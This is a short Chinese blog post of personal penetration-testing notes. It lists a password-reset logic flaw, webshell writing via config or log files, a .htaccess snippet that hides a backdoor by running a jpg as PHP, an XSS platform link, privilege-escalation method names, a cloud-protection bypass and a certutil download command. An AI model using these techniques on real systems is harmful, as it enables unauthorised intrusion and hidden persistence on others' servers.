笔记
首页 > 学习    作者:Iamyc   2019年2月15日 15:14 星期五   热度:311°   百度已收录  
时间:2019-2-15 15:14   热度:311° 

今天或者前几天学到的一些,记录下来:

逻辑漏洞:密码重置用户名设置为空,导致查询不到,修改密码改包用户名再发包,逻辑为真。

文件包含漏洞:很普遍。。。这倒是需要注意,这几天都没挖这方面的。

提供一个xss平台:http://xss.klmyssn.com/xss.php?do=login(十三年的,我自己xss用的少)

有时候可以直接插配置文件或日志文件写马。

隐藏后门可以通过.htaccess解析篡改,比如把jpg当php用:<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>

快速判断服务器是windows还是linux:linux对大小写敏感。

常见提权:UDF提权、VBS启动项提权、Linx MySQL BackDoor提权、MIX.DLL提权。

对阿里云服务器不要扫目录和爆破,一种绕过是直接扫ip

代码审计:有些明显漏洞的文件访问不了时,找能访问的文件(可能文件包含调用)

windows自带下载命令:certutil -urlcache -split -f http://www.baidu.com/1.rar



二维码加载中...
本文作者:Iamyc      文章标题: 笔记
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=64
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog